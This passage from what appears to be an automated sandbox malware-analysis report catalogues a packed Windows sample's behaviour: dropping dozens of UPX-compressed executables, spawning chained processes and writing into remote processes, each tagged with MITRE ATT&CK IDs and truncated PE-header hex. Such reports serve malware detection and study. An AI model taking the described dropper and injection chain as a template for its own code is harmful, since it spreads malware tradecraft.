4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dvfrj.exe\" wrote 15072 bytes starting with PE header signature to file \"C:\\bjjnnr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bjjnnr.exe\" wrote 15086 bytes starting with PE header signature to file \"C:\\jplfnb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jplfnb.exe\" wrote 15106 bytes starting with PE header signature to file \"C:\\tfvnr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tfvnr.exe\" wrote 15122 bytes starting with PE header signature to file \"C:\\fhjvtn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fhjvtn.exe\" wrote 15137 bytes starting with PE header signature to file \"C:\\fxpnhnj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fxpnhnj.exe\" wrote 15157 bytes starting with PE header signature to file \"C:\\ldjdlxp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ldjdlxp.exe\" wrote 15176 bytes starting with PE header signature to file \"C:\\ttrtrr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ttrtrr.exe\" wrote 15194 bytes starting with PE header signature to file \"C:\\xjjln.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xjjln.exe\" wrote 15204 bytes starting with PE header signature to file \"C:\\vtxfp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vtxfp.exe\" wrote 15214 bytes starting with PE header signature to file \"C:\\ffpprbb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ffpprbb.exe\" wrote 15229 bytes starting with PE header signature to file \"C:\\xrfrdxf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xrfrdxf.exe\" wrote 15249 bytes starting with PE header signature to file \"C:\\brbjvx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"brbjvx.exe\" wrote 15265 bytes starting with PE header signature to file \"C:\\xrtxff.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xrtxff.exe\" wrote 15279 bytes starting with PE header signature to file \"C:\\ptfff.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ptfff.exe\" wrote 15291 bytes starting with PE header signature to file \"C:\\ttnbl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ttnbl.exe\" wrote 15310 bytes starting with PE header signature to file \"C:\\thbfpv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"thbfpv.exe\" wrote 15329 bytes starting with PE header signature to file \"C:\\666086.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"666086.exe\" wrote 15340 bytes starting with PE header signature to file \"C:\\6264048.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6264048.exe\" wrote 15350 bytes starting with PE header signature to file \"C:\\664222.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"664222.exe\" wrote 15367 bytes starting with PE header signature to file \"C:\\8024206.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8024206.exe\" wrote 15381 bytes starting with PE header signature to file \"C:\\822462.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"822462.exe\" wrote 15400 bytes starting with PE header signature to file \"C:\\4602048.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4602048.exe\" wrote 15411 bytes starting with PE header signature to file \"C:\\jhftx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"2824064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"686826.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4460482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"60026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"0628066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"422622.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4284246.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xdfpfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rhvphd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xltnrpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vlrlrxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bdjjvlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4060084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"084822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jhftx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jhftx.exe]- [targetUID: 00000000-00001728]\n \"4602048.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4602048.exe]- [targetUID: 00000000-00004620]\n \"822462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: 00000000-00004212]\n \"8024206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8024206.exe]- [targetUID: 00000000-00003580]\n \"664222.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\664222.exe]- [targetUID: 00000000-00003800]\n \"6264048.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6264048.exe]- [targetUID: 00000000-00003800]\n \"666086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\666086.exe]- [targetUID: 00000000-00003064]\n \"thbfpv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thbfpv.exe]- [targetUID: 00000000-00003064]\n \"ttnbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ttnbl.exe]- [targetUID: 00000000-00004536]\n \"ptfff.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptfff.exe]- [targetUID: 00000000-00004536]\n \"xrtxff.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrtxff.exe]- [targetUID: 00000000-00003976]\n \"brbjvx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\brbjvx.exe]- [targetUID: 00000000-00003976]\n \"xrfrdxf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrfrdxf.exe]- [targetUID: 00000000-00000900]\n \"ffpprbb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ffpprbb.exe]- [targetUID: 00000000-00000900]\n \"vtxfp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtxfp.exe]- [targetUID: 00000000-00003248]\n \"xjjln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjjln.exe]- [targetUID: 00000000-00003248]\n \"ttrtrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ttrtrr.exe]- [targetUID: 00000000-00002528]\n \"ldjdlxp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldjdlxp.exe]- [targetUID: 00000000-00002192]\n \"fxpnhnj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxpnhnj.exe]- [targetUID: 00000000-00002192]\n \"fhjvtn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhjvtn.exe]- [targetUID: 00000000-00000984]\n \"tfvnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tfvnr.exe]- [targetUID: 00000000-00000984]\n \"jplfnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jplfnb.exe]- [targetUID: 00000000-00004524]\n \"bjjnnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bjjnnr.exe]- [targetUID: 00000000-00000500]\n \"dvfrj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvfrj.exe]- [targetUID: 00000000-00000500]\n \"620206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\620206.exe]- [targetUID: 00000000-00004048]\n \"04620.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04620.exe]- [targetUID: 00000000-00004048]\n \"8204220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8204220.exe]- [targetUID: 00000000-00002676]\n \"220440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\220440.exe]- [targetUID: 00000000-00001952]\n \"206020.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\206020.exe]- [targetUID: 00000000-00001952]\n \"848682.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848682.exe]- [targetUID: 00000000-00003744]\n \"nvlntp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvlntp.exe]- [targetUID: 00000000-00003888]\n \"dvlplh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvlplh.exe]- [targetUID: 00000000-00003888]\n \"jxbtp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxbtp.exe]- [targetUID: 00000000-00003712]\n \"dhfjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dhfjp.exe]- [targetUID: 00000000-00003712]\n \"08246.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08246.exe]- [targetUID: 00000000-00002228]\n \"288226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\288226.exe]- [targetUID: 00000000-00002536]\n \"6620064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6620064.exe]- [targetUID: 00000000-00002536]\n \"bnrrj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnrrj.exe]- [targetUID: 00000000-00004304]\n \"ptvbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptvbh.exe]- [targetUID: 00000000-00002820]\n \"0488840.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0488840.exe]- [targetUID: 00000000-00002820]\n \"280282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\280282.exe]- [targetUID: 00000000-00004236]\n \"66206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66206.exe]- [targetUID: 00000000-00004236]\n \"600468.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\600468.exe]- [targetUID: 00000000-00003768]\n \"42866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42866.exe]- [targetUID: 00000000-00003768]\n \"4424228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4424228.exe]- [targetUID: 00000000-00002780]\n \"086880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\086880.exe]- [targetUID: 00000000-00002560]\n \"062080.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\062080.exe]- [targetUID: 00000000-00004348]\n \"6248060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6248060.exe]- [targetUID: 00000000-00003912]\n \"vrdnrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vrdnrx.exe]- [targetUID: 00000000-00003912]\n \"lvlfrln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvlfrln.exe]- [targetUID: 00000000-00004260]\n \"22202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22202.exe]- [targetUID: 00000000-00004260]\n \"848862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848862.exe]- [targetUID: 00000000-00003396]\n \"6644862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6644862.exe]- [targetUID: 00000000-00003396]\n \"408802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\408802.exe]- [targetUID: 00000000-00004168]\n \"rpbpdxh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rpbpdxh.exe]- [targetUID: 00000000-00004168]\n \"nrdphjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrdphjv.exe]- [targetUID: 00000000-00004308]\n \"dvrdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvrdf.exe]- [targetUID: 00000000-00004308]\n \"4404242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4404242.exe]- [targetUID: 00000000-00006140]\n \"0228060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0228060.exe]- [targetUID: 00000000-00004128]\n \"824686.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\824686.exe]- [targetUID: 00000000-00004124]\n \"802862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\802862.exe]- [targetUID: 00000000-00004124]\n \"0020002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0020002.exe]- [targetUID: 00000000-00005940]\n \"lnvjpll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lnvjpll.exe]- [targetUID: 00000000-00005988]\n \"dhxhp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dhxhp.exe]- [targetUID: 00000000-00005988]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has section name UPX1 with entropy \"7.97244478673\"\n \"2824064.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"686826.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4460482.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"60026.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0628066.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"422622.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4284246.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xdfpfx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rhvphd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xltnrpf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vlrlrxl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bdjjvlh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4060084.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"084822.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jhftx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4602048.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"822462.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"8024206.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"664222.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"6264048.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"666086.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"thbfpv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ttnbl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ptfff.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has a section named \"UPX0\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has a section named \"UPX1\"\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has a section named \"UPX2\"\n \"2824064.exe\" has a section named \"UPX0\"\n \"2824064.exe\" has a section named \"UPX1\"\n \"2824064.exe\" has a section named \"UPX2\"\n \"686826.exe\" has a section named \"UPX0\"\n \"686826.exe\" has a section named \"UPX1\"\n \"686826.exe\" has a section named \"UPX2\"\n \"4460482.exe\" has a section named \"UPX0\"\n \"4460482.exe\" has a section named \"UPX1\"\n \"4460482.exe\" has a section named \"UPX2\"\n \"60026.exe\" has a section named \"UPX0\"\n \"60026.exe\" has a section named \"UPX1\"\n \"60026.exe\" has a section named \"UPX2\"\n \"0628066.exe\" has a section named \"UPX0\"\n \"0628066.exe\" has a section named \"UPX1\"\n \"0628066.exe\" has a section named \"UPX2\"\n \"422622.exe\" has a section named \"UPX0\"\n \"422622.exe\" has a section named \"UPX1\"\n \"422622.exe\" has a section named \"UPX2\"\n \"4284246.exe\" has a section named \"UPX0\"\n \"4284246.exe\" has a section named \"UPX1\"\n \"4284246.exe\" has a section named \"UPX2\"\n \"xdfpfx.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (UID: 00000000-00005920)\n Spawned process \"dhxhp.exe\" (UID: 00000000-00005988)\n Spawned process \"lnvjpll.exe\" (UID: 00000000-00005940)\n Spawned process \"0020002.exe\" (UID: 00000000-00005896)\n Spawned process \"802862.exe\" (UID: 00000000-00004124)\n Spawned process \"824686.exe\" (UID: 00000000-00004400)\n Spawned process \"0228060.exe\" (UID: 00000000-00004128)\n Spawned process \"4404242.exe\" (UID: 00000000-00006140)\n Spawned process \"dvrdf.exe\" (UID: 00000000-00004308)\n Spawned process \"nrdphjv.exe\" (UID: 00000000-00004324)\n Spawned process \"rpbpdxh.exe\" (UID: 00000000-00004168)\n Spawned process \"408802.exe\" (UID: 00000000-00002508)\n Spawned process \"6644862.exe\" (UID: 00000000-00003396)\n Spawned process \"848862.exe\" (UID: 00000000-00004200)\n Spawned process \"22202.exe\" (UID: 00000000-00004260)\n Spawned process \"lvlfrln.exe\" (UID: 00000000-00004192)\n Spawned process \"vrdnrx.exe\" (UID: 00000000-00003912)\n Spawned process \"6248060.exe\" (UID: 00000000-00004348)\n Spawned process \"062080.exe\" (UID: 00000000-00002560)\n Spawned process \"086880.exe\" (UID: 00000000-00002780)\n Spawned process \"4424228.exe\" (UID: 00000000-00003840)\n Spawned process \"42866.exe\" (UID: 00000000-00003768)\n Spawned process \"600468.exe\" (UID: 00000000-00002532)\n Spawned process \"66206.exe\" (UID: 00000000-00004236)\n Spawned process \"280282.exe\" (UID: 00000000-00004496)\n Spawned process \"0488840.exe\" (UID: 00000000-00002820)\n Spawned process \"ptvbh.exe\" (UID: 00000000-00002796)\n Spawned process \"bnrrj.exe\" (UID: 00000000-00004304)\n Spawned process \"6620064.exe\" (UID: 00000000-00002536)\n Spawned process \"288226.exe\" (UID: 00000000-00002228)\n Spawned process \"08246.exe\" (UID: 00000000-00002868)\n Spawned process \"dhfjp.exe\" (UID: 00000000-00003712)\n Spawned process \"jxbtp.exe\" (UID: 00000000-00003556)\n Spawned process \"dvlplh.exe\" (UID: 00000000-00003888)\n Spawned process \"nvlntp.exe\" (UID: 00000000-00003904)\n Spawned process \"848682.exe\" (UID: 00000000-00003744)\n Spawned process \"206020.exe\" (UID: 00000000-00001952)\n Spawned process \"220440.exe\" (UID: 00000000-00002676)\n Spawned process \"8204220.exe\" (UID: 00000000-00003224)\n Spawned process \"04620.exe\" (UID: 00000000-00004048)\n Spawned process \"620206.exe\" (UID: 00000000-00001916)\n Spawned process \"dvfrj.exe\" (UID: 00000000-00000500)\n Spawned process \"bjjnnr.exe\" (UID: 00000000-00004524)\n Spawned process \"jplfnb.exe\" (UID: 00000000-00004288)\n Spawned process \"tfvnr.exe\" (UID: 00000000-00000984)\n Spawned process \"fhjvtn.exe\" (UID: 00000000-00000708)\n Spawned process \"fxpnhnj.exe\" (UID: 00000000-00002192)\n Spawned process \"ldjdlxp.exe\" (UID: 00000000-00000656)\n Spawned process \"ttrtrr.exe\" (UID: 00000000-00002528)\n Spawned process \"xjjln.exe\" (UID: 00000000-00003248)\n Spawned process \"vtxfp.exe\" (UID: 00000000-00001684)\n Spawned process \"ffpprbb.exe\" (UID: 00000000-00000900)\n Spawned process \"xrfrdxf.exe\" (UID: 00000000-00001440)\n Spawned process \"brbjvx.exe\" (UID: 00000000-00003976)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" wrote 32 bytes to a remote process \"C:\\dhxhp.exe\" (Handle: 68)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" wrote 52 bytes to a remote process \"C:\\dhxhp.exe\" (Handle: 68)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" wrote 4 bytes to a remote process \"C:\\dhxhp.exe\" (Handle: 68)\n \"dhxhp.exe\" wrote 32 bytes to a remote process \"C:\\lnvjpll.exe\" (Handle: 116)\n \"dhxhp.exe\" wrote 52 bytes to a remote process \"C:\\lnvjpll.exe\" (Handle: 116)\n \"dhxhp.exe\" wrote 4 bytes to a remote process \"C:\\lnvjpll.exe\" (Handle: 116)\n \"lnvjpll.exe\" wrote 32 bytes to a remote process \"C:\\0020002.exe\" (Handle: 68)\n \"lnvjpll.exe\" wrote 52 bytes to a remote process 